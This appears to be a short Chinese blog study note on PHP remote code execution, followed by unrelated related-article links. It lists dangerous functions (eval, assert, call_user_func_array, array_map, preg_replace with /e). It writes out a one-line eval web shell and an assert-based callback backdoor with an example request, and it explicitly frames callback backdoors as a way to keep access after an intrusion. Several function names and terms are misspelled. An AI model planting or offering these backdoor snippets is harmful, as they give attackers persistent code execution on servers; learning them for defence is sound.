当前位置: 首页 > news >正文

RCE随笔(1)

news 2025/7/21 7:15:01

哪些是可以执行代码执行:php代码。

eval

如:eval:<?php eval($_post['key']);

eval:php中不被叫做函数叫动态执行命令

assert:执行函数

 call_user_func_array

<?php call_user_func_array('assert',array($_REQUEST['shu']));

传入xxs-labs/test.php?shu=phpinfo();

 

回调回门(用于留后门的,方便下次渗透):

回调后门的闭住:call_user_func()

call_user_func_array()

 call_user_func

 array_filter

  arrya_map

 uasort、uksort、array_walk、array_walk_recursive

preg_replace

当匹配的格式有|e的时候匹配到的字符会投到eval里面执行

哪些是可以执行命令:服务器的命令。

http://www.lryc.cn/news/593908.html

相关文章:

  • RK3588 安卓adb操作
  • C++ - 仿 RabbitMQ 实现消息队列--服务端核心模块实现(一)
  • RK3588 编译 Android 13 镜像方法
  • 状态管理与团队协作 - SRE 的核心关切
  • c#:TCP服务端管理类
  • 第一章: 初识 Redis:背后的特性和典型应用场景
  • c#:管理TCP服务端发送数据为非16进制
  • 网络原理——IP
  • CentOS 服务器docker pull 拉取失败
  • Docker 在 Ubuntu 系统中的详细操作指南
  • 【Docker-Day 7】揭秘 Dockerfile 启动指令:CMD、ENTRYPOINT、ENV、ARG 与 EXPOSE 详解
  • Docker实战:使用Docker部署envlinks极简个人导航页
  • 企业级安全威胁检测与响应(EDR/XDR)架构设计
  • 如何解决pip安装报错error subprocess-exited-with-error问题
  • Twisted study notes[2]
  • 六年级数学知识边界总结思考-下册
  • 在Ubutu22系统上面离线安装Go语言环境【教程】
  • 传染病监测(六):随机模型 —— 为什么小规模疫情像掷骰子?
  • 【LeetCode 热题 100】200. 岛屿数量——DFS
  • MCP实战案例|Trae2.0 一键创建旅行助手并一键部署EdgeOne
  • axios二次封装-单个、特定的实例的拦截器、所有实例的拦截器。
  • Laravel 原子锁概念讲解
  • sqli-labs靶场通关笔记:第34-37关 宽字节注入的其他情况
  • docker Neo4j
  • PDF 编辑器:多文件合并 拆分 旋转 顺序随便调 加水印 密码锁 页码背景
  • Python 进阶知识之numpy库(一)
  • 考研最高效的准备工作是什么
  • 【JDK内置工具】常用工具和实战指令
  • 30天打牢数模基础-决策树讲解
  • Docker在NAS部署MoonTV+OrionTV